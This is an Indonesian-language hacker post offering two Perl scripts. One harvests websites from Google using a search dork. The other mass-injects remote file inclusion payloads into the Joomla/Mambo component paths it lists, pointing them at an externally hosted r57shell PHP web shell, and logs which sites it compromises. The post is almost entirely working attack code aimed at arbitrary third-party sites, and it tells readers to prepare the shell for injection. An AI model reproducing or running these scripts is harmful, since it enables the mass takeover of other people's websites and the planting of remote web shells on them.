Google Mass Remote File Inclussion Scanner
-------------------------------------------
By : LoneEagle


    Gw hanya bisa geleng - geleng kepala dengan banyaknya advisories
Remote file inclussion baik di securityfocus atau milw0rm, ga terasa
advisories security hanya layaknya mainan anak kecil yang malas
menganalisa code, terbukti dengan banyaknya advisories yang isinya
hanya google dork : "blablabla", what kind of lamme advisories!!

    Ahh, gw ga peduli dengan semua itu gw cuma mo share google mass
RFI scanner dari pada nyari bug di CMS (kan uda banyak yang nyari :D)
Cara pakenya sederhana aja
1. Siapin r57shell sebagai phpshell untuk inject
2. perl lwpgoogle.pl <dork>
3. perl massinject.pl <file_output_lwpgoogle>


=========================== lwpgoogle.pl ==============================


#!/usr/bin/perl
#Reference :
#http://geocities.com/iko94/
#http://www.troubleshooters.com/codecorn/littperl/perlreg.htm

print "Grabbing website through google\n";
print "Code By LoneEagle\n";
print "http://kandangjamur.net\n";

if(!$ARGV[0]){
  print "Usage #perl $0 <dork>\n";
  exit;
}

require LWP::UserAgent;
use HTTP::Message;

$proxy='http://127.0.0.1:2221/';
$dork=$ARGV[0];
$ua = LWP::UserAgent->new;
$ua->timeout(30);
$ua->agent("MSIE/6.0 Windows");
$ua->proxy(http => $proxy) if defined($proxy);
$counter=0;
print "Pencarian menggunakan kata kunci : $dork\n";
$hasil="";
while($hasilx !~ /hasil penyajian/)
{
  $googleurl="http://www.google.co.id/search?q=$dork&hl=id&lr=&start=$a&sa=N";
  $grabresponse = $ua->get($googleurl);
  $counter=$counter+10;
  if (!($grabresponse->is_success)) {
  print ($grabresponse->status_line. "  Failure\n");
  } else {
    @hasil = $grabresponse->as_string;
    $hasilx="@hasil";
    sleep 1;
    #print "$hasilx";
    if($hasilx =~ /tak cocok/)
    {
      print "Ga ada hasil boz\n";
      exit;
    }
  
    while($hasilx =~ m/<a class=l href=".*?" on.*?<\/a>/)
    {
      $hasilx =~ s/<a class=l href="(.*?)" on.*?<\/a>/$1/;
      $hell = $1;
      print "$hell\n";
      open(f,">>google_log.txt");
      print f "$hell\n";
      close(f);
    }
    $a+=10;
  }
 }
print "\nSilakan liat hasilnya di google_log.txt\n";


============================ massinject.pl ===============================

#!/usr/bin/perl
#Reference :
#http://geocities.com/iko94/
#http://www.troubleshooters.com/codecorn/littperl/perlreg.htm
#http://www.tizag.com/perlT/perlarrays.php

print "Mass Remote File Inclussion\n";
print "Code By LoneEagle\n";
print "http://kandangjamur.net\n";

if(!$ARGV[0])
{
  print "Usage #$0 <google_file>\n";
  exit;
}

require LWP::UserAgent;
use HTTP::Message;

#KONFIGURASI MASS INJECTION
#DEFINISI VULNERABILITY (TAMBAIH DEWEK YOHH!!)
$vuln="components/com_calendar.php?absolute_path=";
#$vuln="components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=";
#$vuln="components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=";
#$vuln="components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=";
#DAN LAINNYA TAMBAH NDIRI
#DEFINISI EVIL HTTP PHPSHELL
$phpshell="http://fuck.com/audit/mylocalakses/phpshell.txt?";
#AKHIR KONFIGURASI

$proxy='http://172.20.2.1:3128/';
$google_f=$ARGV[0];
$ua = LWP::UserAgent->new;
$ua->timeout(30);
$ua->agent("MSIE/6.0 Windows");
$ua->proxy(http => $proxy) if defined($proxy);

open(ff,$google_f);
@myurl=<ff>;
close(ff);

for($a=0;$a<$#myurl;$a++)
{
  $myurl[$a] =~ m/(http:\/\/.*?\/)index.php/;
  if($1 !~ //)
  {
    $gourl=$1.$vuln.$phpshell;
    #$gourl=$1.$vuln.$phpshell;
    #$gourl=$1.$vuln.$phpshell;
    #$gourl=$1.$vuln.$phpshell;
    print "Processing $gourl ...\n";
    $browse = $ua->get($gourl);
    if(!($browse->is_success)) {
      print($browse->status_line. "  Failure\n");
    } elsif(($browse->is_success)) {
      @hasil = $browse->as_string;
      $hasilx = "@hasil";
      if($hasilx =~ /http:\/\/rst.void.ru\/download\/r57shell.txt/){
        print("  VULNERABLE..[OK]\n");
        open(f,">>vulnlog.txt");
        print f "$gourl\n";
        close(f);
      } else {
        print "Not Vulnerable\n";
      }
    }
  }
}

print "Finish RFI mass injecting, see result in vulnlog.txt file\n";


============================== EOF =================================